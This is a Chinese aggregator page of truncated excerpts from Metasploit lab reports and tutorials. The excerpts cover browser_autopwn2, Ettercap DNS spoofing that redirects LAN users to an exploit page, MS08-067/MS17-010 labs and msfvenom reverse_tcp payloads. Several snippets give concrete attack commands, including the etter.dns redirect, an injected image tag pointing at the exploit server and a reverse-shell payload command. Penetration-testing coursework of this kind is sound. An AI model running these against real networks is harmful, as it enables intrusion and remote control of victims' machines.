browser_autopwn2】的更多相关文章

系统:kali 2019  工具Ettercap,Metasploit 环境内网地址 首先 cd /etc/ettercap/ 移动在ettercap 文件下 在用vim 打开编辑 etter.dns 进去后 我们将局域网内 所有18段的ip 访问网页都欺骗跳转到本机ip 80端口 在里面添加 接着 编辑文件/var/www/html/index.html ,添加<html><img src="192.168.18.141/auto" ></html>…
browser_autopwn2是个啥玩意儿? 一个集合了浏览器漏洞的小框架 option msf > use auxiliary/server/browser_autopwn2 msf auxiliary(browser_autopwn2) > show actions msf auxiliary(browser_autopwn2) > set ACTION <action-name> msf auxiliary(browser_autopwn2) > show op…
浏览器攻击 browser_autpwn2 (BAP2) mkdir /test 为接受响应的服务器创建目录   use auxiliary/server/browser_autopwn2  set SRVHOST 192.168.56.1  set URIPATH /test #假设我们的攻击目标是 PC,并不打算依赖于 Adobe Flash 的授权.我们会排除 Android 和 Flash 的利用.   set EXCLUDE_PATTERN android|adobe_flash   …
一.知识点总结 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六种模块 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去 主动渗透攻击:攻击某个系统服务 被动渗透攻击:攻击某个客户端应用 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提 网络服务的扫描与查点 探查敏感信息泄露.Fuzz测试发掘漏洞 收集登录密码 攻击载荷Payload Module…
实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何一个辅助模块.(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分 一.实验内容说明及基础问题回答 1.实验内容 本实践目标是掌握meta…
20165309 <网络对抗技术>实验五:MSF基础应用 1.基础问题回答 (1)什么是exploit? (2)什么是payload? (3)什么是encode? (4)离实战还缺些什么技术或步骤? 2.实践总结与体会 (1)遇到的问题与解决 (2)实验感受 3.实践过程记录 (0)准备工作 (1)主动攻击实践:MS12-020 (2)自动化浏览器攻击:browser_autopwn (3)针对客户端的攻击:Adobe (4)应用辅助模块:zoomeye_search(唯一) 1.基础问题回答…
Exp5 MSF基础应用 实践内容 主动攻击实践 ms17_010_enternalblue 靶机:win7 x64成功 针对浏览器的攻击 ms14_064_ole_code_execution 靶机:winXP成功 靶机:win7失败 针对客户端的攻击 adobe_cooltype_sing 靶机:winXP成功 ms15_020_shortcut_icon_dllloader 靶机:winXP成功 成功应用任何一个辅助模块 gather/browser_info 靶机:winXP成功且唯一…
2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用 一.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践:MS08-067(成功) 一个针对浏览器的攻击:MS10_002_aurora(失败).browser_autpwn2(成功).vm_1漏洞系统BodgeIt(成功且唯一) 一个针对客户端的攻击:adobe_toolbutton(成功) 一个辅助模块:http_vertion(成功且唯一…
Exp5:MSF基础应用 一.基础问题回答 (1)用自己的话解释什么是 exploit , payload , encode. exploit: 设相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机. payload: 简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务. encode: 针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payloa…
2018-2019 20165226 Exp5 MSF基础应用 目录 一.实验内容说明及基础问题回答 二.实验过程 Task1 主动攻击实践 ms08_067 ms17_010 Task2 针对浏览器的攻击 ms11_050 browser_autopwn(唯一,失败) Task3 对客户端的攻击,如Adobe Task4 成功应用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块(唯一) 三.问题与思考 四.实验总结 一.实验内容说明及基础问题…
在无法通过网络边界的情况下转而攻击客户端----进行社会工程学攻击,进而渗透线上业务网络 含有漏洞利用代码的web站点--利用客户端漏洞 含有漏洞利用代码的doc,pdf等文档----诱使被害者执行payload 诱骗被害者执行payload(windows) msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -b "\x00" -e x86/shi…
前言: 前两篇文章介绍了The WiFi Pineapple Nano设备的一些主要功能模块,例如PineAP.SSLsplit和Ettercap等.今天给大家实际场景演示下如何利用Pineapple Nano来攻击客户端并且获取客户端SHELL的过程. 0×01  Evil Portal模块 首先,我们还是先介绍模块的基本功能,再进行实验过程的展示,本次实验中我们主要使用到的模块是Evil Portal和PineAP,关于PineAP模块的功能及用法,在我的其他文章中已经提过,这里就不重复介绍…
渗透测试者的困扰▪ 需要掌握数百个工具软件,上千个命令参数,实在记不住▪ 新出现的漏洞PoC/EXP有不同的运行环境要求,准备工作繁琐▪ 大部分时间都在学习使用不同工具的使用习惯,如果能统一就好了▪ Metasploit 能解决以上困扰吗? MSF架构 ▪ Rex – 基本功能库,用于完成日常基本任务,无需人工手动编码实现 – 处理 socket 连接访问.协议应答(http/SSL/SMB等) – 编码转换(XOR.Base64.Unicode)▪ Msf::Core – 提供 Msf 的核心…